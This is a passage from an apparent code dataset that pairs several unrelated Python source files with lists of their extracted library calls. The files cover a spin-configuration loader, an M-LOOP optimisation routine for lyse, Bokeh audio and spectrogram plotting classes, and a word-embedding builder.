'pad_right'], {'mode': '"""reflect"""'}), "(x, pad_left, pad_right, mode='reflect')\n", (552, 592), False, 'from scattering.scattering1d.utils import pad1D, modulus, subsample_fourier\n'), ((2683, 2698), 'torch.abs', 'torch.abs', (['diff'], {}), '(diff)\n', (2692, 2698), False, 'import torch\n'), ((2873, 2888), 'torch.abs', 'torch.abs', (['diff'], {}), '(diff)\n', (2882, 2888), False, 'import torch\n'), ((3122, 3145), 'torch.abs', 'torch.abs', (['x0.grad.data'], {}), '(x0.grad.data)\n', (3131, 3145), False, 'import torch\n'), ((4492, 4530), 'numpy.max', 'np.max', (['x_sub[ind_start[j]:ind_end[j]]'], {}), '(x_sub[ind_start[j]:ind_end[j]])\n', (4498, 4530), True, 'import numpy as np\n'), ((483, 505), 'torch.randn', 'torch.randn', (['(100)', '(4)', 'N'], {}), '(100, 4, N)\n', (494, 505), False, 'import torch\n'), ((1317, 1338), 'torch.sum', 'torch.sum', (['(x_pad ** 2)'], {}), '(x_pad ** 2)\n', (1326, 1338), False, 'import torch\n'), ((3806, 3839), 'numpy.abs', 'np.abs', (['(x[:, :, ::2 ** j] - x_sub)'], {}), '(x[:, :, ::2 ** j] - x_sub)\n', (3812, 3839), True, 'import numpy as np\n'), ((4635, 4663), 'numpy.min', 'np.min', (['x_sub[:ind_start[j]]'], {}), '(x_sub[:ind_start[j]])\n', (4641, 4663), True, 'import numpy as np\n'), ((4729, 4755), 'numpy.min', 'np.min', (['x_sub[ind_end[j]:]'], {}), '(x_sub[ind_end[j]:])\n', (4735, 4755), True, 'import numpy as np\n'), ((1951, 1966), 'torch.abs', 'torch.abs', (['diff'], {}), '(diff)\n', (1960, 1966), False, 'import torch\n'), ((834, 849), 'torch.abs', 'torch.abs', (['diff'], {}), '(diff)\n', (843, 849), False, 'import torch\n'), ((996, 1011), 'torch.abs', 'torch.abs', (['diff'], {}), '(diff)\n', (1005, 1011), False, 'import torch\n'), ((1225, 1240), 'torch.abs', 'torch.abs', (['diff'], {}), '(diff)\n', (1234, 1240), False, 'import torch\n')]
|
from pathlib import Path
import numpy as np
from .config import Config
from .spin import Spin
def load(path: Path) -> Config:
with path.open() as file:
lines = file.readlines()
global_optimum, best_solution = lines[0].split(' ')
global_optimum = float(global_optimum.strip())
best_solution = best_solution.strip()
best_solution = [float(gene) for gene in best_solution]
best_solution = np.array(best_solution)
spin_configs = []
for line in lines[2:]:
a_index, b_index, factor = line.split(' ')
a_index = int(a_index)
b_index = int(b_index)
factor = int(factor)
spin_config = Spin(
a_index,
b_index,
factor
)
spin_configs.append(spin_config)
config = Config(
path.name,
global_optimum,
best_solution,
spin_configs
)
return config
|
[
"numpy.array"
] |
[((445, 468), 'numpy.array', 'np.array', (['best_solution'], {}), '(best_solution)\n', (453, 468), True, 'import numpy as np\n')]
|
import lyse
import runmanager.remote as rm
import numpy as np
import mloop_config
import sys
import logging
import os
from labscript_utils.setup_logging import LOG_PATH
try:
from labscript_utils import check_version
except ImportError:
raise ImportError('Require labscript_utils > 2.1.0')
check_version('lyse', '2.5.0', '4.0')
check_version('zprocess', '2.13.1', '4.0')
check_version('labscript_utils', '2.12.5', '4.0')
def configure_logging(config):
console_log_level = config['analysislib_console_log_level']
file_log_level = config['analysislib_file_log_level']
LOG_FILENAME = 'analysislib_mloop.log'
global logger
logger = logging.getLogger('analysislib_mloop')
logger.setLevel(logging.DEBUG)
formatter = logging.Formatter(
'%(filename)s:%(funcName)s:%(lineno)d:%(levelname)s: %(message)s'
)
# Set up handlers if not already present from previous runs.
if not logger.handlers:
# Set up console handler
console_handler = logging.StreamHandler(sys.stdout)
console_handler.setLevel(console_log_level)
console_handler.setFormatter(formatter)
logger.addHandler(console_handler)
# Set up file handler
full_filename = os.path.join(LOG_PATH, LOG_FILENAME)
file_handler = logging.FileHandler(full_filename, mode='w')
file_handler.setLevel(file_log_level)
file_handler.setFormatter(formatter)
logger.addHandler(file_handler)
logger.debug('Logger configured.')
def check_runmanager(config):
logger.debug('Checking runmanager...')
msgs = []
logger.debug('Getting globals.')
rm_globals = rm.get_globals()
if not all([x in rm_globals for x in config['mloop_params']]):
msgs.append('Not all optimisation parameters present in runmanager.')
logger.debug('Getting run shots state.')
if not rm.get_run_shots():
msgs.append('Run shot(s) not selected in runmanager.')
logger.debug('Checking for errors in globals.')
if rm.error_in_globals():
msgs.append('Error in runmanager globals.')
logger.debug('Checking number of shots.')
n_shots = rm.n_shots()
if n_shots > 1 and not config['ignore_bad']:
msgs.append(
f'runmanager is set to compile {n_shots:d} shots per request, but your '
+ 'mloop_config has ignore_bad = False. You are advised to (i) remove '
+ 'iterable globals so as to compile one shot per cost or (ii) set '
+ 'ignore_bad = True in your mloop_config and only return one cost with '
+ 'bad = False per sequence.'
)
if msgs:
logger.warning('\n'.join(msgs))
return False
else:
logger.debug('Runmanager ok.')
return True
def verify_globals(config):
logger.debug('Verifying globals...')
# Get the current runmanager globals
logger.debug('Getting values of globals from runmanager.')
rm_globals = rm.get_globals()
current_values = [rm_globals[name] for name in config['mloop_params']]
# Retrieve the parameter values requested by M-LOOP on this iteration
logger.debug('Getting requested globals values from lyse.routine_storage.')
requested_values = lyse.routine_storage.params
requested_dict = dict(zip(config['mloop_params'], requested_values))
# Get the parameter values for the shot we just computed the cost for
logger.debug('Getting lyse dataframe.')
df = lyse.data()
shot_values = [df[name].iloc[-1] for name in config['mloop_params']]
# Verify integrity by cross-checking against what was requested
if not np.array_equal(current_values, requested_values):
message = (
'Cost requested for values different to those in runmanager.\n'
'Please add an executed shot to lyse with: {requested_dict}'
).format(requested_dict=requested_dict)
logger.error(message)
return False
if not np.array_equal(shot_values, requested_values):
message = (
'Cost requested for different values to those used to compute cost.\n'
'Please add an executed shot to lyse with: {requested_dict}'
).format(requested_dict=requested_dict)
logger.error(message)
return False
logger.debug('Globals verified.')
return True
def cost_analysis(cost_key=(None,), maximize=True, x=None):
"""Return a cost dictionary to M-LOOP with at least:
{'bad': True} or {'cost': float}.
    - Look for the latest cost in the cost_key column of the lyse
      DataFrame and an uncertainty ('u_' prefix at the lowest level).
- Report bad shot to M-LOOP if cost is nan or inf.
- Negate value in DataFrame if maximize = True.
- Fallback to reporting a constant or fake cost (from x).
"""
logger.debug('Getting cost...')
cost_dict = {'bad': False}
# Retrieve current lyse DataFrame
logger.debug('Getting lyse dataframe.')
df = lyse.data()
# Use the most recent shot
ix = -1
# Retrieve cost from specified column
if len(df) and cost_key in df:
cost = (df[cost_key].astype(float).values)[ix]
if np.isnan(cost) or np.isinf(cost):
cost_dict['bad'] = True
logger.info('Got bad cost: {cost}'.format(cost=cost))
else:
cost_dict['cost'] = (1 - 2 * maximize) * cost
logger.info('Got cost: {cost}'.format(cost=cost_dict['cost']))
u_cost_key = cost_key[:-1] + ('u_' + cost_key[-1],)
if u_cost_key in df:
cost_dict['uncer'] = df[u_cost_key].iloc[ix]
logger.info('Got uncertainty: {uncer}'.format(uncer=cost_dict['uncer']))
# If it doesn't exist, generate a fake cost
elif x is not None:
from fake_result import fake_result
cost_dict['cost'] = (1 - 2 * maximize) * fake_result(x)
logger.info('Faked cost: {cost}'.format(cost=cost_dict['cost']))
# Or just use a constant cost (for debugging)
else:
cost_dict['cost'] = 1.2
logger.info('Faked constant cost: {cost}'.format(cost=cost_dict['cost']))
return cost_dict
if __name__ == '__main__':
config = mloop_config.get()
configure_logging(config)
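    # Overall flow (added summary of the branches below): the first execution starts a
    # background M-LOOP interface thread; on later executions, while that thread is
    # alive, the cost of the newest shot is computed and handed over through
    # lyse.routine_storage.queue.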
if not hasattr(lyse.routine_storage, 'queue'):
logger.info('First execution of lyse routine...')
try:
from queue import Queue
except ImportError:
# PY2
from Queue import Queue
logger.debug('Creating queue.')
lyse.routine_storage.queue = Queue()
if (
hasattr(lyse.routine_storage, 'optimisation')
and lyse.routine_storage.optimisation.is_alive()
):
cost_dict = cost_analysis(
cost_key=config['cost_key'] if not config['mock'] else [],
maximize=config['maximize'],
x=lyse.routine_storage.params[0] if config['mock'] else None,
)
if not cost_dict['bad'] or not config['ignore_bad']:
if check_runmanager(config):
if verify_globals(config):
logger.debug('Putting cost in queue.')
lyse.routine_storage.queue.put(cost_dict)
else:
message = 'NOT putting cost in queue because verify_globals failed.'
logger.debug(message)
else:
message = 'NOT putting cost in queue because check_runmanager failed.'
logger.debug(message)
else:
message = (
'NOT putting cost in queue because cost was bad and ignore_bad is True.'
)
logger.debug(message)
elif check_runmanager(config):
logger.info('(Re)starting optimisation process...')
import threading
import mloop_interface
logger.debug('Starting interface thread...')
lyse.routine_storage.optimisation = threading.Thread(
target=mloop_interface.main
)
lyse.routine_storage.optimisation.daemon = True
lyse.routine_storage.optimisation.start()
logger.debug('Interface thread started.')
else:
print(
'\nNot (re)starting optimisation process.',
'Please address above warnings before trying again.',
)
|
[
"numpy.isnan",
"labscript_utils.check_version",
"logging.Formatter",
"lyse.data",
"mloop_config.get",
"os.path.join",
"logging.FileHandler",
"lyse.routine_storage.queue.put",
"Queue.Queue",
"runmanager.remote.get_globals",
"threading.Thread",
"lyse.routine_storage.optimisation.is_alive",
"logging.StreamHandler",
"fake_result.fake_result",
"numpy.isinf",
"runmanager.remote.n_shots",
"runmanager.remote.get_run_shots",
"runmanager.remote.error_in_globals",
"lyse.routine_storage.optimisation.start",
"numpy.array_equal",
"logging.getLogger"
] |
[((313, 350), 'labscript_utils.check_version', 'check_version', (['"""lyse"""', '"""2.5.0"""', '"""4.0"""'], {}), "('lyse', '2.5.0', '4.0')\n", (326, 350), False, 'from labscript_utils import check_version\n'), ((352, 394), 'labscript_utils.check_version', 'check_version', (['"""zprocess"""', '"""2.13.1"""', '"""4.0"""'], {}), "('zprocess', '2.13.1', '4.0')\n", (365, 394), False, 'from labscript_utils import check_version\n'), ((396, 445), 'labscript_utils.check_version', 'check_version', (['"""labscript_utils"""', '"""2.12.5"""', '"""4.0"""'], {}), "('labscript_utils', '2.12.5', '4.0')\n", (409, 445), False, 'from labscript_utils import check_version\n'), ((685, 723), 'logging.getLogger', 'logging.getLogger', (['"""analysislib_mloop"""'], {}), "('analysislib_mloop')\n", (702, 723), False, 'import logging\n'), ((777, 866), 'logging.Formatter', 'logging.Formatter', (['"""%(filename)s:%(funcName)s:%(lineno)d:%(levelname)s: %(message)s"""'], {}), "(\n '%(filename)s:%(funcName)s:%(lineno)d:%(levelname)s: %(message)s')\n", (794, 866), False, 'import logging\n'), ((1708, 1724), 'runmanager.remote.get_globals', 'rm.get_globals', ([], {}), '()\n', (1722, 1724), True, 'import runmanager.remote as rm\n'), ((2079, 2100), 'runmanager.remote.error_in_globals', 'rm.error_in_globals', ([], {}), '()\n', (2098, 2100), True, 'import runmanager.remote as rm\n'), ((2219, 2231), 'runmanager.remote.n_shots', 'rm.n_shots', ([], {}), '()\n', (2229, 2231), True, 'import runmanager.remote as rm\n'), ((3050, 3066), 'runmanager.remote.get_globals', 'rm.get_globals', ([], {}), '()\n', (3064, 3066), True, 'import runmanager.remote as rm\n'), ((3559, 3570), 'lyse.data', 'lyse.data', ([], {}), '()\n', (3568, 3570), False, 'import lyse\n'), ((5096, 5107), 'lyse.data', 'lyse.data', ([], {}), '()\n', (5105, 5107), False, 'import lyse\n'), ((6339, 6357), 'mloop_config.get', 'mloop_config.get', ([], {}), '()\n', (6355, 6357), False, 'import mloop_config\n'), ((1036, 1069), 'logging.StreamHandler', 'logging.StreamHandler', (['sys.stdout'], {}), '(sys.stdout)\n', (1057, 1069), False, 'import logging\n'), ((1274, 1310), 'os.path.join', 'os.path.join', (['LOG_PATH', 'LOG_FILENAME'], {}), '(LOG_PATH, LOG_FILENAME)\n', (1286, 1310), False, 'import os\n'), ((1335, 1379), 'logging.FileHandler', 'logging.FileHandler', (['full_filename'], {'mode': '"""w"""'}), "(full_filename, mode='w')\n", (1354, 1379), False, 'import logging\n'), ((1932, 1950), 'runmanager.remote.get_run_shots', 'rm.get_run_shots', ([], {}), '()\n', (1948, 1950), True, 'import runmanager.remote as rm\n'), ((3728, 3776), 'numpy.array_equal', 'np.array_equal', (['current_values', 'requested_values'], {}), '(current_values, requested_values)\n', (3742, 3776), True, 'import numpy as np\n'), ((4064, 4109), 'numpy.array_equal', 'np.array_equal', (['shot_values', 'requested_values'], {}), '(shot_values, requested_values)\n', (4078, 4109), True, 'import numpy as np\n'), ((6717, 6724), 'Queue.Queue', 'Queue', ([], {}), '()\n', (6722, 6724), False, 'from Queue import Queue\n'), ((6803, 6847), 'lyse.routine_storage.optimisation.is_alive', 'lyse.routine_storage.optimisation.is_alive', ([], {}), '()\n', (6845, 6847), False, 'import lyse\n'), ((5304, 5318), 'numpy.isnan', 'np.isnan', (['cost'], {}), '(cost)\n', (5312, 5318), True, 'import numpy as np\n'), ((5322, 5336), 'numpy.isinf', 'np.isinf', (['cost'], {}), '(cost)\n', (5330, 5336), True, 'import numpy as np\n'), ((8105, 8150), 'threading.Thread', 'threading.Thread', ([], {'target': 'mloop_interface.main'}), 
'(target=mloop_interface.main)\n', (8121, 8150), False, 'import threading\n'), ((8241, 8282), 'lyse.routine_storage.optimisation.start', 'lyse.routine_storage.optimisation.start', ([], {}), '()\n', (8280, 8282), False, 'import lyse\n'), ((6000, 6014), 'fake_result.fake_result', 'fake_result', (['x'], {}), '(x)\n', (6011, 6014), False, 'from fake_result import fake_result\n'), ((7323, 7364), 'lyse.routine_storage.queue.put', 'lyse.routine_storage.queue.put', (['cost_dict'], {}), '(cost_dict)\n', (7353, 7364), False, 'import lyse\n')]
|
from .util import Audio
from abc import ABC, abstractmethod
import numpy as np
from scipy import fft, signal
from IPython.display import display
from bokeh.plotting import figure, show
from bokeh.layouts import gridplot
from bokeh.models.mappers import LinearColorMapper
from bokeh.models.ranges import DataRange1d
from bokeh.models.tools import HoverTool
from bokeh.palettes import Viridis256
from bokeh.io import output_notebook
output_notebook()
def get_samples_and_rate(input_signal, samplerate):
if isinstance(input_signal, TimeSignal):
if samplerate is not None:
print('Explicitly defined samplerate gets ignored when input is a TimeSignal', samplerate)
samples = input_signal.samples
samplerate = input_signal.samplerate
elif np.ndim(input_signal) > 0:
if samplerate is None:
raise ValueError('The samplerate needs to be defined explicitly when input is an array or other iterable')
samples = np.asarray(input_signal)
else:
raise TypeError('Only TimeSignals, Numpy arrays or other iterables are supported as input, not {}'.format(type(input_signal)))
return samples, samplerate
def get_samples(input_signal):
if isinstance(input_signal, TimeSignal):
return input_signal.samples
elif np.ndim(input_signal) > 0:
return np.asarray(input_signal)
else:
raise TypeError('Only TimeSignals, Numpy arrays or other iterables are supported as input, not {}'.format(type(input_signal)))
def get_both_samples_and_rate(input_signal1, input_signal2, samplerate=None):
samples1, samplerate1 = get_samples_and_rate(input_signal1, samplerate)
samples2, samplerate2 = get_samples_and_rate(input_signal2, samplerate)
if samplerate1 != samplerate2:
raise ValueError('Both signals need to have the same samplerate')
return samples1, samples2, samplerate1
def get_both_samples(input_signal1, input_signal2):
samples1 = get_samples(input_signal1)
samples2 = get_samples(input_signal2)
if isinstance(input_signal1, TimeSignal) and isinstance(input_signal2, TimeSignal) and input_signal1.samplerate != input_signal2.samplerate:
raise ValueError('Both signals need to have the same samplerate')
return samples1, samples2
def same_type_as(output_samples, input_signal):
if isinstance(input_signal, TimeSignal):
return type(input_signal)(output_samples, input_signal.samplerate)
else:
return output_samples
class Signal(ABC):
@abstractmethod
def plot(self, **fig_args):
pass
def _repr_html_(self):
return show(self.plot())
def display(self, **fig_args):
show(self.plot(**fig_args))
class TimeSignal(Signal):
def __init__(self, samples, samplerate):
self.samples = samples
self.samplerate = samplerate
self.timepoints = np.arange(len(samples)) / samplerate
def plot(self, **fig_args):
fig = figure(width=800, height=400, x_axis_label='time [s]', y_axis_label='amplitude',
tools='pan,wheel_zoom,box_zoom,zoom_in,zoom_out,save,reset', active_drag='pan')
fig.line(self.timepoints, self.samples, line_width=2)
return fig
class AudioSignal(TimeSignal):
def __init__(self, samples, samplerate):
super().__init__(samples, samplerate)
def play(self, normalize=False):
return display(Audio(self.samples, rate=self.samplerate, normalize=normalize))
def plot(self, **fig_args):
default_args = {
'width': 900, 'height': 300,
'x_axis_label': 'time [s]', 'y_axis_label': 'amplitude',
'y_range': (-1, 1),
'tools': 'xpan,xwheel_zoom,box_zoom,xzoom_in,xzoom_out,save,reset',
'active_drag': 'xpan',
'active_inspect': 'auto',
'active_scroll': 'auto',
'toolbar_location': 'above',
}
hover_tool = HoverTool(
tooltips=[('time [s]', '$x{0.000}'), ('amplitude', '$y{0.000}')],
mode='vline',
)
fig = figure(**{**default_args, **fig_args})
fig.line(self.timepoints, self.samples, line_width=2)
fig.add_tools(hover_tool)
return fig
class Spectrum(Signal):
def __init__(self, input, samplerate=None, num_bins=None, power=1, decibels=True):
samples, samplerate = get_samples_and_rate(input, samplerate)
if num_bins is None:
num_bins = len(samples)
self.power = power
self.decibels = decibels
self.spectrum = np.abs(fft.rfft(samples, num_bins))
self.frequencies = np.arange(len(self.spectrum)) * samplerate / num_bins
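        # Note: fft.rfft returns num_bins // 2 + 1 bins spanning 0 Hz up to the Nyquist
        # frequency, so the bin spacing used above is samplerate / num_bins.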
if decibels:
self.spectrum = power * 10 * np.log10(self.spectrum)
else:
self.spectrum **= power
def plot(self, **fig_args):
default_args = {
'width': 900, 'height': 300,
'x_axis_label': 'frequency [Hz]', 'y_axis_label': 'amplitude',
'tools': 'pan,wheel_zoom,box_zoom,zoom_in,zoom_out,save,reset',
'active_drag': 'pan',
'active_inspect': 'auto',
'active_scroll': 'auto',
'toolbar_location': 'above',
}
hover_tool = HoverTool(
tooltips=[('frequency [Hz]', '$x{0.}'), ['amplitude', '$y{0.000}']],
mode='vline',
)
if self.power == 2:
default_args['y_axis_label'] = 'power'
hover_tool.tooltips[1][0] = 'power'
if self.decibels:
default_args['y_axis_label'] += ' [dB]'
hover_tool.tooltips[1][0] += ' [dB]'
fig = figure(**{**default_args, **fig_args})
fig.line(self.frequencies, self.spectrum, line_width=2)
fig.add_tools(hover_tool)
return fig
class PowerSpectrum(Spectrum):
def __init__(self, input, samplerate=None, num_bins=None, decibels=True):
super().__init__(input, samplerate=samplerate, num_bins=num_bins, power=2, decibels=decibels)
class Spectrogram(Signal):
def __init__(self, input_signal, frame_duration, step_duration, samplerate=None, num_bins=None, window='hann', power=1, decibels=True):
samples, samplerate = get_samples_and_rate(input_signal, samplerate)
self.power = power
self.decibels = decibels
frame_size = round(frame_duration * samplerate)
overlap_size = round((frame_duration-step_duration) * samplerate)
self.frequencies, self.times, self.array = signal.stft(samples, fs=samplerate, window=window, nperseg=frame_size, noverlap=overlap_size)
if decibels:
self.array = power * 10 * np.log10(self.array)
else:
self.array **= power
def plot(self, lowest_value=None, highest_value=None, palette=None, **fig_args):
if not palette:
palette = list(reversed(Viridis256))
if not lowest_value:
lowest_value = np.min(np.abs(self.array))
if not highest_value:
highest_value = np.max(np.abs(self.array))
default_args = {
'width': 900, 'height': 400,
'x_axis_label': 'time [s]', 'y_axis_label': 'frequency [Hz]',
'tools': 'hover,pan,wheel_zoom,box_zoom,zoom_in,zoom_out,save,reset',
'active_drag': 'pan',
'active_inspect': 'auto',
'active_scroll': 'auto',
'toolbar_location': 'above',
'tooltips': [('time [s]', '$x{0.000}'), ('frequency [Hz]', '$y{0.}'), ['amplitude', '@image']],
}
if self.power == 2:
default_args['tooltips'][2][0] = 'power'
if self.decibels:
default_args['tooltips'][2][0] += ' [dB]'
fig = figure(**{**default_args, **fig_args})
if isinstance(fig.x_range, DataRange1d):
fig.x_range.range_padding = 0
if isinstance(fig.y_range, DataRange1d):
fig.y_range.range_padding = 0
mapper = LinearColorMapper(palette=palette, low=lowest_value, high=highest_value)
fig.image([np.abs(self.array)], x=self.times[0], y=self.frequencies[0], dw=self.times[-1], dh=self.frequencies[-1], color_mapper=mapper)
return fig
|
[
"bokeh.io.output_notebook",
"bokeh.plotting.figure",
"numpy.abs",
"numpy.asarray",
"scipy.fft.rfft",
"numpy.ndim",
"bokeh.models.tools.HoverTool",
"bokeh.models.mappers.LinearColorMapper",
"numpy.log10",
"scipy.signal.stft"
] |
[((431, 448), 'bokeh.io.output_notebook', 'output_notebook', ([], {}), '()\n', (446, 448), False, 'from bokeh.io import output_notebook\n'), ((2962, 3132), 'bokeh.plotting.figure', 'figure', ([], {'width': '(800)', 'height': '(400)', 'x_axis_label': '"""time [s]"""', 'y_axis_label': '"""amplitude"""', 'tools': '"""pan,wheel_zoom,box_zoom,zoom_in,zoom_out,save,reset"""', 'active_drag': '"""pan"""'}), "(width=800, height=400, x_axis_label='time [s]', y_axis_label=\n 'amplitude', tools=\n 'pan,wheel_zoom,box_zoom,zoom_in,zoom_out,save,reset', active_drag='pan')\n", (2968, 3132), False, 'from bokeh.plotting import figure, show\n'), ((3933, 4026), 'bokeh.models.tools.HoverTool', 'HoverTool', ([], {'tooltips': "[('time [s]', '$x{0.000}'), ('amplitude', '$y{0.000}')]", 'mode': '"""vline"""'}), "(tooltips=[('time [s]', '$x{0.000}'), ('amplitude', '$y{0.000}')],\n mode='vline')\n", (3942, 4026), False, 'from bokeh.models.tools import HoverTool\n'), ((4072, 4110), 'bokeh.plotting.figure', 'figure', ([], {}), '(**{**default_args, **fig_args})\n', (4078, 4110), False, 'from bokeh.plotting import figure, show\n'), ((5250, 5347), 'bokeh.models.tools.HoverTool', 'HoverTool', ([], {'tooltips': "[('frequency [Hz]', '$x{0.}'), ['amplitude', '$y{0.000}']]", 'mode': '"""vline"""'}), "(tooltips=[('frequency [Hz]', '$x{0.}'), ['amplitude', '$y{0.000}'\n ]], mode='vline')\n", (5259, 5347), False, 'from bokeh.models.tools import HoverTool\n'), ((5646, 5684), 'bokeh.plotting.figure', 'figure', ([], {}), '(**{**default_args, **fig_args})\n', (5652, 5684), False, 'from bokeh.plotting import figure, show\n'), ((6506, 6603), 'scipy.signal.stft', 'signal.stft', (['samples'], {'fs': 'samplerate', 'window': 'window', 'nperseg': 'frame_size', 'noverlap': 'overlap_size'}), '(samples, fs=samplerate, window=window, nperseg=frame_size,\n noverlap=overlap_size)\n', (6517, 6603), False, 'from scipy import fft, signal\n'), ((7732, 7770), 'bokeh.plotting.figure', 'figure', ([], {}), '(**{**default_args, **fig_args})\n', (7738, 7770), False, 'from bokeh.plotting import figure, show\n'), ((7970, 8042), 'bokeh.models.mappers.LinearColorMapper', 'LinearColorMapper', ([], {'palette': 'palette', 'low': 'lowest_value', 'high': 'highest_value'}), '(palette=palette, low=lowest_value, high=highest_value)\n', (7987, 8042), False, 'from bokeh.models.mappers import LinearColorMapper\n'), ((779, 800), 'numpy.ndim', 'np.ndim', (['input_signal'], {}), '(input_signal)\n', (786, 800), True, 'import numpy as np\n'), ((974, 998), 'numpy.asarray', 'np.asarray', (['input_signal'], {}), '(input_signal)\n', (984, 998), True, 'import numpy as np\n'), ((1298, 1319), 'numpy.ndim', 'np.ndim', (['input_signal'], {}), '(input_signal)\n', (1305, 1319), True, 'import numpy as np\n'), ((1340, 1364), 'numpy.asarray', 'np.asarray', (['input_signal'], {}), '(input_signal)\n', (1350, 1364), True, 'import numpy as np\n'), ((4569, 4596), 'scipy.fft.rfft', 'fft.rfft', (['samples', 'num_bins'], {}), '(samples, num_bins)\n', (4577, 4596), False, 'from scipy import fft, signal\n'), ((4742, 4765), 'numpy.log10', 'np.log10', (['self.spectrum'], {}), '(self.spectrum)\n', (4750, 4765), True, 'import numpy as np\n'), ((6660, 6680), 'numpy.log10', 'np.log10', (['self.array'], {}), '(self.array)\n', (6668, 6680), True, 'import numpy as np\n'), ((6950, 6968), 'numpy.abs', 'np.abs', (['self.array'], {}), '(self.array)\n', (6956, 6968), True, 'import numpy as np\n'), ((7035, 7053), 'numpy.abs', 'np.abs', (['self.array'], {}), '(self.array)\n', (7041, 7053), True, 'import numpy as 
np\n'), ((8062, 8080), 'numpy.abs', 'np.abs', (['self.array'], {}), '(self.array)\n', (8068, 8080), True, 'import numpy as np\n')]
|
import pandas as pd
import numpy as np
from urllib.parse import urlparse
import io
import gc
import re
import string
from utils import *
import tensorflow as tf
def load_vectors(fname,count_words):
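    # Expected layout (fastText .vec convention): the first line holds the vocabulary
    # size and the vector dimension; every following line holds a token followed by its
    # space-separated float components.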
fin = io.open(fname, 'r', encoding='utf-8', newline='\n', errors='ignore')
n, d = map(int, fin.readline().split())
data = {}
data_list=[]
for line in fin:
tokens = line.rstrip().split(' ')
tk = tokens[0]
if tk in count_words:
vec=list(map(float, tokens[1:]))
data[tk] = vec
data_list.append(vec)
return data,data_list
def glove_load_vectors(fname,count_words):
data={}
fastvec = open(fname)
counter=1
data_list=[]
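    # GloVe text files have no header line, so iterate until the file iterator is
    # exhausted; the bare except below doubles as the end-of-file stop condition
    # (a malformed line would likewise end the loop early).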
while counter>0:
try:
f=fastvec.__next__()
tokens = f.rstrip().split(' ')
tk=tokens[0]
if tk in count_words:
vec = list(map(float, tokens[1:]))
data[tk] = vec
data_list.append(vec)
counter+=1
except:
print("total tokens",counter)
counter=0
pass
return data,data_list
def create_embeddings(train_data,embedding_path,wordvec_name,stop_set,word_dim):
entity1 = train_data["entities"].apply(lambda x: combine_entity(x))
mention_dt = train_data["hashtags"].apply(lambda x: hashtag(x))
url_dt1 = train_data["urls"].apply(lambda x: process_urlPath(x,0,stop_set))
url_dt2 = train_data["urls"].apply(lambda x: process_urlPath(x,1,stop_set))
mention_splt = train_data["mentions"].apply(lambda x: hashtag(x))
dt_concat =pd.concat([entity1,mention_dt,url_dt1,url_dt2,mention_splt],axis=0)
print("create entity tokenizer")
tokenizer = tf.keras.preprocessing.text.Tokenizer(
filters='',
lower=True,
split=" ",
char_level=False,
oov_token=None)
#tokenizer.fit_on_texts(pd.concat([entity1,mention_dt,url_dt,mention_splt],axis=0))
tokenizer.fit_on_texts(dt_concat)
count_thres = 15
count_words = {w:c for w,c in tokenizer.word_counts.items() if c >= count_thres}
    word_counts = len(count_words) + 1  # +1 because tokenizer indices start at 1 (row 0 of the embedding matrix stays unused)
tokenizer = tf.keras.preprocessing.text.Tokenizer(
num_words=word_counts,
filters='',
lower=True,
split=" ",
char_level=False,
oov_token=None)
#tokenizer.fit_on_texts(pd.concat([entity1,mention_dt,url_dt,mention_splt],axis=0))
tokenizer.fit_on_texts(dt_concat)
print("load embedding vectors")
if wordvec_name.split(".")[0]=="glove":
fastvec,fastvec_list = glove_load_vectors(embedding_path,count_words)
else:
fastvec,fastvec_list = load_vectors(embedding_path,count_words)
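    # Tokens kept by the tokenizer but missing from the pretrained vectors all share a
    # single fallback vector, drawn below from a multivariate normal fitted to the mean
    # and covariance of the known embedding vectors.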
cand=np.array(fastvec_list,dtype='float32')
mu=np.mean(cand, axis=0)
Sigma=np.cov(cand.T)
norm=np.random.multivariate_normal(mu, Sigma, 1)
norm = list(np.reshape(norm, word_dim))
word_counts = len(count_words)+1
word_vectors = np.zeros((word_counts,word_dim))
id_w = tokenizer.index_word
for k in range(1,word_vectors.shape[0]):
ky = id_w[k]
if ky in fastvec:
word_vectors[k,:]=fastvec[ky]
else:
word_vectors[k,:]= norm
return tokenizer,word_counts,word_vectors
|
[
"tensorflow.keras.preprocessing.text.Tokenizer",
"numpy.zeros",
"numpy.mean",
"numpy.array",
"numpy.random.multivariate_normal",
"numpy.reshape",
"io.open",
"numpy.cov",
"pandas.concat"
] |
[((213, 281), 'io.open', 'io.open', (['fname', '"""r"""'], {'encoding': '"""utf-8"""', 'newline': '"""\n"""', 'errors': '"""ignore"""'}), "(fname, 'r', encoding='utf-8', newline='\\n', errors='ignore')\n", (220, 281), False, 'import io\n'), ((1759, 1831), 'pandas.concat', 'pd.concat', (['[entity1, mention_dt, url_dt1, url_dt2, mention_splt]'], {'axis': '(0)'}), '([entity1, mention_dt, url_dt1, url_dt2, mention_splt], axis=0)\n', (1768, 1831), True, 'import pandas as pd\n'), ((1886, 1996), 'tensorflow.keras.preprocessing.text.Tokenizer', 'tf.keras.preprocessing.text.Tokenizer', ([], {'filters': '""""""', 'lower': '(True)', 'split': '""" """', 'char_level': '(False)', 'oov_token': 'None'}), "(filters='', lower=True, split=' ',\n char_level=False, oov_token=None)\n", (1923, 1996), True, 'import tensorflow as tf\n'), ((2367, 2500), 'tensorflow.keras.preprocessing.text.Tokenizer', 'tf.keras.preprocessing.text.Tokenizer', ([], {'num_words': 'word_counts', 'filters': '""""""', 'lower': '(True)', 'split': '""" """', 'char_level': '(False)', 'oov_token': 'None'}), "(num_words=word_counts, filters='',\n lower=True, split=' ', char_level=False, oov_token=None)\n", (2404, 2500), True, 'import tensorflow as tf\n'), ((2928, 2967), 'numpy.array', 'np.array', (['fastvec_list'], {'dtype': '"""float32"""'}), "(fastvec_list, dtype='float32')\n", (2936, 2967), True, 'import numpy as np\n'), ((2974, 2995), 'numpy.mean', 'np.mean', (['cand'], {'axis': '(0)'}), '(cand, axis=0)\n', (2981, 2995), True, 'import numpy as np\n'), ((3006, 3020), 'numpy.cov', 'np.cov', (['cand.T'], {}), '(cand.T)\n', (3012, 3020), True, 'import numpy as np\n'), ((3030, 3073), 'numpy.random.multivariate_normal', 'np.random.multivariate_normal', (['mu', 'Sigma', '(1)'], {}), '(mu, Sigma, 1)\n', (3059, 3073), True, 'import numpy as np\n'), ((3175, 3208), 'numpy.zeros', 'np.zeros', (['(word_counts, word_dim)'], {}), '((word_counts, word_dim))\n', (3183, 3208), True, 'import numpy as np\n'), ((3090, 3116), 'numpy.reshape', 'np.reshape', (['norm', 'word_dim'], {}), '(norm, word_dim)\n', (3100, 3116), True, 'import numpy as np\n')]
|
#!/usr/bin/env python3
import os, time, json
import numpy as np
import pandas as pd
from pprint import pprint
import matplotlib as mpl
import matplotlib.pyplot as plt
import matplotlib.colors as mcolors
